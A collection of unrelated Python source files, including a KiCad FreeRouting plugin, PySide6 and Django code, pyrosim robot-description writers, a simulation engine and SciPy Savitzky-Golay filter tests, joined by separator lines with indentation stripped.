sys.stderr.write("Spark Bot URL (for webhook): " + bot_url + "\n")
sys.stderr.write("Spark Bot App Name: " + bot_app_name + "\n")
# Placeholder variables for spark connection objects
spark = None
webhook = None
# Check if the token and email were set in ENV
if spark_token is None or bot_email is None:
sys.stderr.write("Spark Config is missing, please provide via API. Bot not ready.\n")
else:
spark_setup(bot_email, spark_token)
spark = CiscoSparkAPI(access_token=spark_token)
app.run(debug=True, host='0.0.0.0', port=int("5000"))
|
# ///////////////////////////////////////////////////////////////
#
# BY: WANDERSON M.PIMENTA
# PROJECT MADE WITH: Qt Designer and PySide6
# V: 1.0.0
#
# This project can be used freely for all uses, as long as they maintain the
# respective credits only in the Python scripts, any information in the visual
# interface (GUI) can be modified without any implication.
#
# There are limitations on Qt licenses if you want to use your products
# commercially, I recommend reading them on the official website:
# https://doc.qt.io/qtforpython/licenses.html
#
# ///////////////////////////////////////////////////////////////
# IMPORT PACKAGES AND MODULES
# ///////////////////////////////////////////////////////////////
# IMPORT QT CORE
# ///////////////////////////////////////////////////////////////
from qt_core import *
# IMPORT SETTINGS
# ///////////////////////////////////////////////////////////////
from app.gui.core.json_settings import Settings
# IMPORT STYLES
# ///////////////////////////////////////////////////////////////
from . styles import Styles
# PY WINDOW
# ///////////////////////////////////////////////////////////////
class PyWindow(QFrame):
def __init__(
self,
parent,
layout = Qt.Vertical,
margin = 0,
spacing = 2,
bg_color = "#2c313c",
text_color = "#fff",
text_font = "9pt 'Segoe UI'",
border_radius = 10,
border_size = 2,
border_color = "#343b48",
enable_shadow = True
):
super().__init__()
# LOAD SETTINGS
# ///////////////////////////////////////////////////////////////
settings = Settings()
self.settings = settings.items
# PROPERTIES
# ///////////////////////////////////////////////////////////////
self.parent = parent
self.layout = layout
self.margin = margin
self.bg_color = bg_color
self.text_color = text_color
self.text_font = text_font
self.border_radius = border_radius
self.border_size = border_size
self.border_color = border_color
self.enable_shadow = enable_shadow
# OBJECT NAME
# ///////////////////////////////////////////////////////////////
self.setObjectName("pod_bg_app")
# APPLY STYLESHEET
# ///////////////////////////////////////////////////////////////
self.set_stylesheet()
# ADD LAYOUT
# ///////////////////////////////////////////////////////////////
if layout == Qt.Vertical:
# VERTICAL LAYOUT
self.layout = QHBoxLayout(self)
else:
# HORIZONTAL LAYOUT
self.layout = QHBoxLayout(self)
self.layout.setContentsMargins(margin, margin, margin, margin)
self.layout.setSpacing(spacing)
# ADD DROP SHADOW
# ///////////////////////////////////////////////////////////////
if self.settings["custom_title_bar"]:
if enable_shadow:
self.shadow = QGraphicsDropShadowEffect()
self.shadow.setBlurRadius(20)
self.shadow.setXOffset(0)
self.shadow.setYOffset(0)
self.shadow.setColor(QColor(0, 0, 0, 160))
self.setGraphicsEffect(self.shadow)
# APPLY AND UPDATE STYLESHEET
# ///////////////////////////////////////////////////////////////
def set_stylesheet(
self,
bg_color = None,
border_radius = None,
border_size = None,
border_color = None,
text_color = None,
text_font = None
):
# CHECK BG COLOR
if bg_color != None: internal_bg_color = bg_color
else: internal_bg_color = self.bg_color
# CHECK BORDER RADIUS
if border_radius != None: internal_border_radius = border_radius
else: internal_border_radius = self.border_radius
# CHECK BORDER SIZE
if border_size != None: internal_border_size = border_size
else: internal_border_size = self.border_size
# CHECK BORDER COLOR
if text_color != None: internal_text_color = text_color
else: internal_text_color = self.text_color
# CHECK TEXT COLOR
if border_color != None: internal_border_color = border_color
else: internal_border_color = self.border_color
# CHECK TEXT COLOR
if text_font != None: internal_text_font = text_font
else: internal_text_font = self.text_font
self.setStyleSheet(Styles.bg_style.format(
_bg_color = internal_bg_color,
_border_radius = internal_border_radius,
_border_size = internal_border_size,
_border_color = internal_border_color,
_text_color = internal_text_color,
_text_font = internal_text_font
))
|
# ============ FIRST ALGORITHM ============
class Circles(object):
test_img = "cargo1.jpeg"
rescale_size = 0.4
circles_dp = 2.2
circles_minDist = 180
circles_param1 = 75
circles_param2 = 90
circles_minRadius = 10
circles_maxRadius = 500
circle_color = (150, 55, 0)
rectangle_color = (150, 55, 0)
green = (77, 199, 44)
frame_width = 640
frame_height = 480
class TrackCircles(object):
min_blue_HSV = (76, 73, 29)
max_blue_HSV = (134, 255, 255)
min_redx_HSV = (0, 70, 50)
max_redx_HSV = (10, 255, 255)
min_redy_HSV = (160, 33, 45)
max_redy_HSV = (180, 255, 255)
frame_width = 600
|
import cryptops
class Crypto:
def __init__(self, key):
self.key = key
def apply(self, msg, func):
return func(self.key, msg)
crp=Crypto('secretkey')
encrypted=crp.apply('hello world', cryptops.encrypt)
decrypted=crp.apply(encrypted, cryptops.decrypt)
|
import os
import wx
import wx.aui
import time
import pcbnew
import textwrap
import threading
import subprocess
import configparser
import re
# Remove java offending characters
def search_n_strip(s):
s = re.sub('[Ωµ]', '', s)
return s
#
# FreeRouting round trip invocation:
# * export board.dsn file from pcbnew
# * auto route by invoking FreeRouting.jar
# * import generated board.ses file into pcbnew
#
class FreeRoutingPlugin(pcbnew.ActionPlugin):
# init in place of constructor
def defaults(self):
self.here_path = os.path.dirname(__file__)
self.name = "FreeRouting"
self.category = "PCB auto routing"
self.description = "FreeRouting for PCB auto routing"
self.show_toolbar_button = True
self.icon_file_name = os.path.join(self.here_path, 'icon.png')
# Controls KiCAD session file imports (works only in KiCAD nigthly or 6)
self.SPECCTRA=False
# setup execution context
def prepare(self):
self.board = pcbnew.GetBoard()
self.path_tuple = os.path.splitext(self.board.GetFileName())
self.board_prefix = self.path_tuple[0]
config = configparser.ConfigParser()
config_path = os.path.join(self.here_path, 'plugin.ini')
config.read(config_path)
self.java_path = config['java']['path']
self.module_file = config['artifact']['location']
self.module_path = os.path.join(self.here_path, self.module_file)
# Set temp filename
#filename = 'freerouting'
filename = os.path.dirname(self.board_prefix) + '/freerouting'
self.module_input = filename + '.' + config['module']['input_ext']
self.module_output = filename + '.' + config['module']['output_ext']
self.module_rules = filename + '.' + config['module']['rules_ext']
self.module_org_output = self.board_prefix + '.' + config['module']['output_ext']
self.module_org_rules = self.board_prefix + '.' + config['module']['rules_ext']
# Remove previous temp files
try:
os.remove(self.module_input)
os.remove(self.module_output)
os.remove(self.module_rules)
except:
pass
# Create DSN file and remove java offending characters
self.bFirstLine = True
self.bEatNextLine = False
with open(filename + '.' + config['module']['input_ext'], "w") as fw, \
open(self.board_prefix + '.' + config['module']['input_ext'],"r") as fr:
for l in fr:
if self.bFirstLine:
fw.writelines('(pcb ' + self.module_input + '\n')
self.bFirstLine = False
elif self.bEatNextLine:
self.bEatNextLine = l.rstrip()[-2:]!="))"
print(l)
print(self.bEatNextLine)
# Optional: remove one or both copper-pours before run freerouting
#elif l[:28] == " (plane GND (polygon F.Cu":
# self.bEatNextLine = True
#elif l[:28] == " (plane GND (polygon B.Cu":
# self.bEatNextLine = True
else:
fw.writelines(search_n_strip(l))
fr.close()
fw.close()
# Run freerouting with -s
#self.module_command = [self.java_path, "-jar", self.module_path, "-de", self.module_input, "-s"]
# Run freerouting with -do
self.module_command = [self.java_path, "-jar", self.module_path, "-de", self.module_input, "-do", self.module_output]
if self.SPECCTRA:
if os.path.isfile(self.module_input):
os.remove(self.module_input)
if os.path.isfile(self.module_output):
os.remove(self.module_output)
# export board.dsn file from pcbnew
def RunExport(self):
if self.SPECCTRA:
ok = pcbnew.ExportSpecctraDSN(self.module_input)
if ok and os.path.isfile(self.module_input):
return True
else:
wx_show_error("""
Failed to invoke:
* pcbnew.ExportSpecctraDSN
""")
return False
else:
return True
# auto route by invoking FreeRouting.jar
def RunRouter(self):
dialog = ProcessDialog(None, """
Complete or Terminate FreeRouting:
* to complete, close Java window
* to terminate, press Terminate here
""")
def on_complete():
wx_safe_invoke(dialog.terminate)
invoker = ProcessThread(self.module_command, on_complete)
dialog.Show() # dialog first
invoker.start() # run java process
result = dialog.ShowModal() # block pcbnew here
dialog.Destroy()
try:
if result == dialog.result_button: # return via terminate button
invoker.terminate()
return False
elif result == dialog.result_terminate: # return via dialog.terminate()
if invoker.has_ok():
return True
else:
invoker.show_error()
return False
else:
return False # should not happen
finally:
invoker.join(10) # prevent thread resource leak
# import generated board.ses file into pcbnew
def RunImport(self):
if self.SPECCTRA:
ok = pcbnew.ImportSpecctraSES(self.module_output)
if ok and os.path.isfile(self.module_output):
return True
else:
wx_show_error("""
Failed to invoke:
* pcbnew.ImportSpecctraSES
""")
return False
else:
return True
# invoke chain of dependent methods
def RunSteps(self):
self.prepare()
if not self.RunExport() :
return
if not self.RunRouter() :
return
# Remove temp DSN file
os.remove(self.module_input)
# Rename SES and RULES files
try:
os.rename(self.module_output,
self.module_org_output)
os.rename(self.module_rules,
self.module_org_rules)
except:
pass
wx_safe_invoke(self.RunImport)
# kicad plugin action entry
def Run(self):
if self.SPECCTRA:
if has_pcbnew_api():
self.RunSteps()
else:
wx_show_error("""
Missing required python API:
* pcbnew.ExportSpecctraDSN
* pcbnew.ImportSpecctraSES
---
Try development nightly build:
* http://kicad-pcb.org/download/
""")
else:
self.RunSteps()
# provision gui-thread-safe execution context
# https://git.launchpad.net/kicad/tree/pcbnew/python/kicad_pyshell/__init__.py#n89
if 'phoenix' in wx.PlatformInfo:
if not wx.GetApp():
theApp = wx.App()
else:
theApp = wx.GetApp()
# run functon inside gui-thread-safe context, requires wx.App on phoenix
def wx_safe_invoke(function, *args, **kwargs):
wx.CallAfter(function, *args, **kwargs)
# verify required pcbnew api is present
def has_pcbnew_api():
return hasattr(pcbnew, 'ExportSpecctraDSN') and hasattr(pcbnew, 'ImportSpecctraSES')
# message dialog style
wx_caption = "KiCad FreeRouting Plugin"
# display error text to the user
def wx_show_error(text):
message = textwrap.dedent(text)
style = wx.OK | wx.ICON_ERROR
dialog = wx.MessageDialog(None, message=message, caption=wx_caption, style=style)
dialog.ShowModal()
dialog.Destroy()
# prompt user to cancel pending action; allow to cancel programmatically
class ProcessDialog (wx.Dialog):
def __init__(self, parent, text):
message = textwrap.dedent(text)
self.result_button = wx.NewId()
self.result_terminate = wx.NewId()
wx.Dialog.__init__ (self, parent, id=wx.ID_ANY, title=wx_caption, pos=wx.DefaultPosition, size=wx.Size(-1, -1), style=wx.CAPTION)
self.SetSizeHints(wx.DefaultSize, wx.DefaultSize)
sizer = wx.BoxSizer(wx.VERTICAL)
self.text = wx.StaticText(self, wx.ID_ANY, message, wx.DefaultPosition, wx.DefaultSize, 0)
self.text.Wrap(-1)
sizer.Add(self.text, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.ALL, 10)
self.line = wx.StaticLine(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_HORIZONTAL)
sizer.Add(self.line, 0, wx.EXPAND | wx.ALL, 5)
self.bttn = wx.Button(self, wx.ID_ANY, "Terminate", wx.DefaultPosition, wx.DefaultSize, 0)
self.bttn.SetDefault()
sizer.Add(self.bttn, 0, wx.ALIGN_CENTER_HORIZONTAL | wx.ALL, 5)
self.SetSizer(sizer)
self.Layout()
sizer.Fit(self)
self.Centre(wx.BOTH)
self.bttn.Bind(wx.EVT_BUTTON, self.bttn_on_click)
def __del__(self):
pass
def bttn_on_click(self, event):
self.EndModal(self.result_button)
def terminate(self):
self.EndModal(self.result_terminate)
# cancelable external process invoker with completion notification
class ProcessThread(threading.Thread):
def __init__(self, command, on_complete=None):
self.command = command
self.on_complete = on_complete
threading.Thread.__init__(self)
self.setDaemon(True)
# thread runner
def run(self):
try:
self.process = subprocess.Popen(self.command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.stdout, self.stderr = self.process.communicate()
except Exception as error:
self.error = error
finally:
if self.on_complete is not None:
self.on_complete()
def has_ok(self):
return self.has_process() and self.process.returncode == 0
def has_code(self):
return self.has_process() and self.process.returncode != 0
def has_error(self):
return hasattr(self, "error")
def has_process(self):
return hasattr(self, "process")
def terminate(self):
if self.has_process():
self.process.kill()
else:
pass
def show_error(self):
command = " ".join(self.command)
if self.has_error() :
wx_show_error("""
Process failure:
---
command:
%s
---
error:
%s""" % (command, str(self.error)))
elif self.has_code():
wx_show_error("""
Program failure:
---
command:
%s
---
exit code: %d
--- stdout ---
%s
--- stderr ---
%s
""" % (command, self.process.returncode, self.stdout, self.stderr))
else:
pass
# register plugin with kicad backend
FreeRoutingPlugin().register()
|
from rest_framework.viewsets import ModelViewSet
from rest_framework.generics import (
ListAPIView,
CreateAPIView,
UpdateAPIView,
DestroyAPIView,
)
from .models import Team
from .serializers import TeamSerializer
from utils.pagination import PaginationPageNumberPagination
class TeamListAPIView(ListAPIView):
"""
Retrieve FIFA 21 Teams
"""
queryset = Team.objects.all()
serializer_class = TeamSerializer
pagination_class = PaginationPageNumberPagination
class TeamCreateAPIView(CreateAPIView):
"""
Create a new FIFA 21 Team
"""
queryset = Team.objects.all()
serializer_class = TeamSerializer
class TeamUpdateAPIView(UpdateAPIView):
"""
Update a FIFA 21 Team
"""
queryset = Team.objects.all()
serializer_class = TeamSerializer
class TeamDestroyAPIView(DestroyAPIView):
"""
Delete a FIFA 21 Team
"""
queryset = Team.objects.all()
serializer_class = TeamSerializer
|
/home/runner/.cache/pip/pool/b7/df/1e/7980259571f5a43b5ac0c36215dfc4b1485986d14af13b40a821ae930f
|
import pybullet as p
from pyrosim.nndf import NNDF
from pyrosim.linksdf import LINK_SDF
from pyrosim.linkurdf import LINK_URDF
from pyrosim.model import MODEL
from pyrosim.sdf import SDF
from pyrosim.urdf import URDF
from pyrosim.joint import JOINT
SDF_FILETYPE = 0
URDF_FILETYPE = 1
NNDF_FILETYPE = 2
# global availableLinkIndex
# global linkNamesToIndices
def End():
if filetype == SDF_FILETYPE:
sdf.Save_End_Tag(f)
elif filetype == NNDF_FILETYPE:
nndf.Save_End_Tag(f)
else:
urdf.Save_End_Tag(f)
f.close()
def End_Model():
model.Save_End_Tag(f)
def Get_Touch_Sensor_Value_For_Link(linkName):
touchValue = -1.0
desiredLinkIndex = linkNamesToIndices[linkName]
pts = p.getContactPoints()
for pt in pts:
linkIndex = pt[4]
if ( linkIndex == desiredLinkIndex ):
touchValue = 1.0
return touchValue
def Prepare_Link_Dictionary(urdfFileName):
global linkNamesToIndices
linkNamesToIndices = {}
linkIndex = -1
f = open(urdfFileName,"r")
for line in f.readlines():
if "link name" in line:
line = line.split('"')
linkName = line[1]
linkNamesToIndices[linkName] = linkIndex
linkIndex = linkIndex + 1
f.close()
def Prepare_Joint_Dictionary(urdfFileName):
global jointNamesToIndices
jointNamesToIndices = {}
jointIndex = 0
f = open(urdfFileName,"r")
for line in f.readlines():
if "joint name" in line:
line = line.split('"')
jointName = line[1]
jointNamesToIndices[jointName] = jointIndex
jointIndex = jointIndex + 1
f.close()
def Prepare_To_Simulate(urdfFileName):
Prepare_Link_Dictionary(urdfFileName)
Prepare_Joint_Dictionary(urdfFileName)
def Send_Cube(name="default",pos=[0,0,0],size=[1,1,1]):
global availableLinkIndex
if filetype == SDF_FILETYPE:
Start_Model(name,pos)
link = LINK_SDF(name,pos,size)
else:
link = LINK_URDF(name,pos,size)
link.Save(f)
if filetype == SDF_FILETYPE:
End_Model()
linkNamesToIndices[name] = availableLinkIndex
availableLinkIndex = availableLinkIndex + 1
def Send_Joint(name,parent,child,type,position,jointAxis):
joint = JOINT(name,parent,child,type,position)
#print(jointAxis,"printing\n")
joint.Save(f,jointAxis)
def Send_Motor_Neuron(name,jointName):
f.write(' <neuron name = "' + str(name) + '" type = "motor" jointName = "' + jointName + '" />\n')
def Send_Sensor_Neuron(name,linkName):
f.write(' <neuron name = "' + str(name) + '" type = "sensor" linkName = "' + linkName + '" />\n')
def Send_Synapse( sourceNeuronName , targetNeuronName , weight ):
f.write(' <synapse sourceNeuronName = "' + str(sourceNeuronName) + '" targetNeuronName = "' + str(targetNeuronName) + '" weight = "' + str(weight) + '" />\n')
def Set_Motor_For_Joint(bodyIndex,jointName,controlMode,targetPosition,maxForce):
p.setJointMotorControl2(
bodyIndex = bodyIndex,
jointIndex = jointNamesToIndices[jointName],
controlMode = controlMode,
targetPosition = targetPosition,
force = maxForce)
def Start_NeuralNetwork(filename):
global filetype
filetype = NNDF_FILETYPE
global f
f = open(filename,"w")
global nndf
nndf = NNDF()
nndf.Save_Start_Tag(f)
def Start_SDF(filename):
global availableLinkIndex
availableLinkIndex = -1
global linkNamesToIndices
linkNamesToIndices = {}
global filetype
filetype = SDF_FILETYPE
global f
f = open(filename,"w")
global sdf
sdf = SDF()
sdf.Save_Start_Tag(f)
def Start_URDF(filename):
global availableLinkIndex
availableLinkIndex = -1
global linkNamesToIndices
linkNamesToIndices = {}
global filetype
filetype = URDF_FILETYPE
global f
f = open(filename,"w")
global urdf
urdf = URDF()
urdf.Save_Start_Tag(f)
def Start_Model(modelName,pos):
global model
model = MODEL(modelName,pos)
model.Save_Start_Tag(f)
|
from synergine.lib.process.processmanager import KeepedAliveProcessManager
from synergine.core.cycle.PipePackage import PipePackage
from synergine.core.simulation.EventManager import EventManager
from synergine.core.Signals import Signals
from synergine.synergy.event.exception.ActionAborted import ActionAborted
class CycleCalculator():
"""
Run cycles of simulation
"""
ACTION_RUNNED = 'signal.action_runned'
def __init__(self, context, synergy_manager, config, force_main_process=False):
self._context = context
self._synergy_manager = synergy_manager
self._event_manager = EventManager(self._synergy_manager)
self._event_manager.refresh()
self._force_main_process = force_main_process
self._config = config
# TODO: Recuprer le nb de process depuis l'os
self._process_manager = KeepedAliveProcessManager(nb_process=self._config.get('engine.processes', 2),
target=self._process_compute)
self._cycle = 0
self._current_cycle_actions_done = []
def get_cycle(self):
return self._cycle
def compute(self):
self._cycle += 1
#print('cycle: ', self._cycle)
self._current_cycle_actions_done = []
self._compute_events()
self._compute_simulations_end_cycle()
return self._current_cycle_actions_done
def _compute_events(self):
for step_key, mechanisms in enumerate(self._event_manager.get_mechanisms_steps()):
actions = self._get_computeds_objects(step_key)
self._apply_cycle_actions(actions)
self._apply_actions(actions)
def _get_computeds_objects(self, step_key):
pipe_package = self._get_pipe_package_for_collection(step_key)
if not self._force_main_process:
computeds_objects = self._process_manager.get_their_work(pipe_package)
else:
pipe_package.setCountProcess(1)
pipe_package.setCurrentProcessId(0)
computeds_objects = self._process_compute(pipe_package)
return computeds_objects
def _get_pipe_package_for_collection(self, step_key):
pipe_package = PipePackage()
pipe_package.set_step_key(step_key)
self._context.set_cycle(self._cycle)
# TODO: 1: Seule les metas ont besoin d'etre trimbale
# TODO: 2: Transporter le differentiel des metas pour le calculs a traver le reseau
pipe_package.set_context(self._context)
# TODO: Le paquet de retour contient les actions instancies. On peu alleger le paquet en retournant qqch comme ca:
# {action_id: ((obj_id, obj_id, ...), parameters)}
# import sys
# import pickle
# size = sys.getsizeof(pickle.dumps(pipe_package))
# print(size)
return pipe_package
def _process_compute(self, pipe_package):
"""
Since here, we are in process mode: you only have to use metas (objects_ids, states)
:param pipe_package:
:return:
"""
context = pipe_package.get_context()
step_key = pipe_package.get_step_key()
actions = []
for mechanism in self._event_manager.get_mechanisms_steps()[step_key]:
mechanism_actions = mechanism.run(context)
for mechanism_action in mechanism_actions:
actions.append(mechanism_action)
return actions
def _apply_cycle_actions(self, actions):
"""
Execute actions cycle run.
:param actions:
:return:
"""
executed_cycle_classes = []
for action in actions:
if type(action) not in executed_cycle_classes:
action.cycle_pre_run(self._context, self._synergy_manager)
executed_cycle_classes.append(type(action))
def _apply_actions(self, actions):
"""
Execute all actions run.
:param actions: list of actions
:return:
"""
for action in actions:
obj = self._synergy_manager.get_map().get_object(action.get_object_id())
try:
action.run(obj, self._context, self._synergy_manager)
Signals.signal(action.__class__).send(obj=obj, context=self._context)
self._current_cycle_actions_done.append(action)
except ActionAborted:
pass
def _compute_simulations_end_cycle(self):
for simulation in self._synergy_manager.get_simulations():
simulation.end_cycle(self._context)
def end(self):
self._process_manager.stop()
|
import numpy as np
from numpy.testing import (assert_allclose, assert_equal,
assert_almost_equal, assert_array_equal,
assert_array_almost_equal)
from scipy.ndimage import convolve1d
from scipy.signal import savgol_coeffs, savgol_filter
from scipy.signal._savitzky_golay import _polyder
def check_polyder(p, m, expected):
dp = _polyder(p, m)
assert_array_equal(dp, expected)
def test_polyder():
cases = [
([5], 0, [5]),
([5], 1, [0]),
([3, 2, 1], 0, [3, 2, 1]),
([3, 2, 1], 1, [6, 2]),
([3, 2, 1], 2, [6]),
([3, 2, 1], 3, [0]),
([[3, 2, 1], [5, 6, 7]], 0, [[3, 2, 1], [5, 6, 7]]),
([[3, 2, 1], [5, 6, 7]], 1, [[6, 2], [10, 6]]),
([[3, 2, 1], [5, 6, 7]], 2, [[6], [10]]),
([[3, 2, 1], [5, 6, 7]], 3, [[0], [0]]),
]
for p, m, expected in cases:
check_polyder(np.array(p).T, m, np.array(expected).T)
#--------------------------------------------------------------------
# savgol_coeffs tests
#--------------------------------------------------------------------
def alt_sg_coeffs(window_length, polyorder, pos):
"""This is an alternative implementation of the SG coefficients.
It uses numpy.polyfit and numpy.polyval. The results should be
equivalent to those of savgol_coeffs(), but this implementation
is slower.
window_length should be odd.
"""
if pos is None:
pos = window_length // 2
t = np.arange(window_length)
unit = (t == pos).astype(int)
h = np.polyval(np.polyfit(t, unit, polyorder), t)
return h
def test_sg_coeffs_trivial():
# Test a trivial case of savgol_coeffs: polyorder = window_length - 1
h = savgol_coeffs(1, 0)
assert_allclose(h, [1])
h = savgol_coeffs(3, 2)
assert_allclose(h, [0, 1, 0], atol=1e-10)
h = savgol_coeffs(5, 4)
assert_allclose(h, [0, 0, 1, 0, 0], atol=1e-10)
h = savgol_coeffs(5, 4, pos=1)
assert_allclose(h, [0, 0, 0, 1, 0], atol=1e-10)
h = savgol_coeffs(5, 4, pos=1, use='dot')
assert_allclose(h, [0, 1, 0, 0, 0], atol=1e-10)
def compare_coeffs_to_alt(window_length, order):
# For the given window_length and order, compare the results
# of savgol_coeffs and alt_sg_coeffs for pos from 0 to window_length - 1.
# Also include pos=None.
for pos in [None] + list(range(window_length)):
h1 = savgol_coeffs(window_length, order, pos=pos, use='dot')
h2 = alt_sg_coeffs(window_length, order, pos=pos)
assert_allclose(h1, h2, atol=1e-10,
err_msg=("window_length = %d, order = %d, pos = %s" %
(window_length, order, pos)))
def test_sg_coeffs_compare():
# Compare savgol_coeffs() to alt_sg_coeffs().
for window_length in range(1, 8, 2):
for order in range(window_length):
compare_coeffs_to_alt(window_length, order)
def test_sg_coeffs_exact():
polyorder = 4
window_length = 9
halflen = window_length // 2
x = np.linspace(0, 21, 43)
delta = x[1] - x[0]
# The data is a cubic polynomial. We'll use an order 4
# SG filter, so the filtered values should equal the input data
# (except within half window_length of the edges).
y = 0.5 * x ** 3 - x
h = savgol_coeffs(window_length, polyorder)
y0 = convolve1d(y, h)
assert_allclose(y0[halflen:-halflen], y[halflen:-halflen])
# Check the same input, but use deriv=1. dy is the exact result.
dy = 1.5 * x ** 2 - 1
h = savgol_coeffs(window_length, polyorder, deriv=1, delta=delta)
y1 = convolve1d(y, h)
assert_allclose(y1[halflen:-halflen], dy[halflen:-halflen])
# Check the same input, but use deriv=2. d2y is the exact result.
d2y = 3.0 * x
h = savgol_coeffs(window_length, polyorder, deriv=2, delta=delta)
y2 = convolve1d(y, h)
assert_allclose(y2[halflen:-halflen], d2y[halflen:-halflen])
def test_sg_coeffs_deriv():
# The data in `x` is a sampled parabola, so using savgol_coeffs with an
# order 2 or higher polynomial should give exact results.
i = np.array([-2.0, 0.0, 2.0, 4.0, 6.0])
x = i ** 2 / 4
dx = i / 2
d2x = np.full_like(i, 0.5)
for pos in range(x.size):
coeffs0 = savgol_coeffs(5, 3, pos=pos, delta=2.0, use='dot')
assert_allclose(coeffs0.dot(x), x[pos], atol=1e-10)
coeffs1 = savgol_coeffs(5, 3, pos=pos, delta=2.0, use='dot', deriv=1)
assert_allclose(coeffs1.dot(x), dx[pos], atol=1e-10)
coeffs2 = savgol_coeffs(5, 3, pos=pos, delta=2.0, use='dot', deriv=2)
assert_allclose(coeffs2.dot(x), d2x[pos], atol=1e-10)
def test_sg_coeffs_deriv_gt_polyorder():
"""
If deriv > polyorder, the coefficients should be all 0.
This is a regression test for a bug where, e.g.,
savgol_coeffs(5, polyorder=1, deriv=2)
raised an error.
"""
coeffs = savgol_coeffs(5, polyorder=1, deriv=2)
assert_array_equal(coeffs, np.zeros(5))
coeffs = savgol_coeffs(7, polyorder=4, deriv=6)
assert_array_equal(coeffs, np.zeros(7))
def test_sg_coeffs_large():
# Test that for large values of window_length and polyorder the array of
# coefficients returned is symmetric. The aim is to ensure that
# no potential numeric overflow occurs.
coeffs0 = savgol_coeffs(31, 9)
assert_array_almost_equal(coeffs0, coeffs0[::-1])
coeffs1 = savgol_coeffs(31, 9, deriv=1)
assert_array_almost_equal(coeffs1, -coeffs1[::-1])
# --------------------------------------------------------------------
# savgol_coeffs tests for even window length
# --------------------------------------------------------------------
def test_sg_coeffs_even_window_length():
# Simple case - deriv=0, polyorder=0, 1
window_lengths = [4, 6, 8, 10, 12, 14, 16]
for length in window_lengths:
h_p_d = savgol_coeffs(length, 0, 0)
assert_allclose(h_p_d, 1/length)
# Verify with closed forms
# deriv=1, polyorder=1, 2
def h_p_d_closed_form_1(k, m):
return 6*(k - 0.5)/((2*m + 1)*m*(2*m - 1))
# deriv=2, polyorder=2
def h_p_d_closed_form_2(k, m):
numer = 15*(-4*m**2 + 1 + 12*(k - 0.5)**2)
denom = 4*(2*m + 1)*(m + 1)*m*(m - 1)*(2*m - 1)
return numer/denom
for length in window_lengths:
m = length//2
expected_output = [h_p_d_closed_form_1(k, m)
for k in range(-m + 1, m + 1)][::-1]
actual_output = savgol_coeffs(length, 1, 1)
assert_allclose(expected_output, actual_output)
actual_output = savgol_coeffs(length, 2, 1)
assert_allclose(expected_output, actual_output)
expected_output = [h_p_d_closed_form_2(k, m)
for k in range(-m + 1, m + 1)][::-1]
actual_output = savgol_coeffs(length, 2, 2)
assert_allclose(expected_output, actual_output)
actual_output = savgol_coeffs(length, 3, 2)
assert_allclose(expected_output, actual_output)
#--------------------------------------------------------------------
# savgol_filter tests
#--------------------------------------------------------------------
def test_sg_filter_trivial():
""" Test some trivial edge cases for savgol_filter()."""
x = np.array([1.0])
y = savgol_filter(x, 1, 0)
assert_equal(y, [1.0])
# Input is a single value. With a window length of 3 and polyorder 1,
# the value in y is from the straight-line fit of (-1,0), (0,3) and
# (1, 0) at 0. This is just the average of the three values, hence 1.0.
x = np.array([3.0])
y = savgol_filter(x, 3, 1, mode='constant')
assert_almost_equal(y, [1.0], decimal=15)
x = np.array([3.0])
y = savgol_filter(x, 3, 1, mode='nearest')
assert_almost_equal(y, [3.0], decimal=15)
x = np.array([1.0] * 3)
y = savgol_filter(x, 3, 1, mode='wrap')
assert_almost_equal(y, [1.0, 1.0, 1.0], decimal=15)
def test_sg_filter_basic():
# Some basic test cases for savgol_filter().
x = np.array([1.0, 2.0, 1.0])
y = savgol_filter(x, 3, 1, mode='constant')
assert_allclose(y, [1.0, 4.0 / 3, 1.0])
y = savgol_filter(x, 3, 1, mode='mirror')
assert_allclose(y, [5.0 / 3, 4.0 / 3, 5.0 / 3])
y = savgol_filter(x, 3, 1, mode='wrap')
assert_allclose(y, [4.0 / 3, 4.0 / 3, 4.0 / 3])
def test_sg_filter_2d():
x = np.array([[1.0, 2.0, 1.0],
[2.0, 4.0, 2.0]])
expected = np.array([[1.0, 4.0 / 3, 1.0],
[2.0, 8.0 / 3, 2.0]])
y = savgol_filter(x, 3, 1, mode='constant')
assert_allclose(y, expected)
y = savgol_filter(x.T, 3, 1, mode='constant', axis=0)
assert_allclose(y, expected.T)
def test_sg_filter_interp_edges():
# Another test with low degree polynomial data, for which we can easily
# give the exact results. In this test, we use mode='interp', so
# savgol_filter should match the exact solution for the entire data set,
# including the edges.
t = np.linspace(-5, 5, 21)
delta = t[1] - t[0]
# Polynomial test data.
x = np.array([t,
3 * t ** 2,
t ** 3 - t])
dx = np.array([np.ones_like(t),
6 * t,
3 * t ** 2 - 1.0])
d2x = np.array([np.zeros_like(t),
np.full_like(t, 6),
6 * t])
window_length = 7
y = savgol_filter(x, window_length, 3, axis=-1, mode='interp')
assert_allclose(y, x, atol=1e-12)
y1 = savgol_filter(x, window_length, 3, axis=-1, mode='interp',
deriv=1, delta=delta)
assert_allclose(y1, dx, atol=1e-12)
y2 = savgol_filter(x, window_length, 3, axis=-1, mode='interp',
deriv=2, delta=delta)
assert_allclose(y2, d2x, atol=1e-12)
# Transpose everything, and test again with axis=0.
x = x.T
dx = dx.T
d2x = d2x.T
y = savgol_filter(x, window_length, 3, axis=0, mode='interp')
assert_allclose(y, x, atol=1e-12)
y1 = savgol_filter(x, window_length, 3, axis=0, mode='interp',
deriv=1, delta=delta)
assert_allclose(y1, dx, atol=1e-12)
y2 = savgol_filter(x, window_length, 3, axis=0, mode='interp',
deriv=2, delta=delta)
assert_allclose(y2, d2x, atol=1e-12)
def test_sg_filter_interp_edges_3d():
# Test mode='interp' with a 3-D array.
t = np.linspace(-5, 5, 21)
delta = t[1] - t[0]
x1 = np.array([t, -t])
x2 = np.array([t ** 2, 3 * t ** 2 + 5])
x3 = np.array([t ** 3, 2 * t ** 3 + t ** 2 - 0.5 * t])
dx1 = np.array([np.ones_like(t), -np.ones_like(t)])
dx2 = np.array([2 * t, 6 * t])
dx3 = np.array([3 * t ** 2, 6 * t ** 2 + 2 * t - 0.5])
# z has shape (3, 2, 21)
z = np.array([x1, x2, x3])
dz = np.array([dx1, dx2, dx3])
y = savgol_filter(z, 7, 3, axis=-1, mode='interp', delta=delta)
assert_allclose(y, z, atol=1e-10)
dy = savgol_filter(z, 7, 3, axis=-1, mode='interp', deriv=1, delta=delta)
assert_allclose(dy, dz, atol=1e-10)
# z has shape (3, 21, 2)
z = np.array([x1.T, x2.T, x3.T])
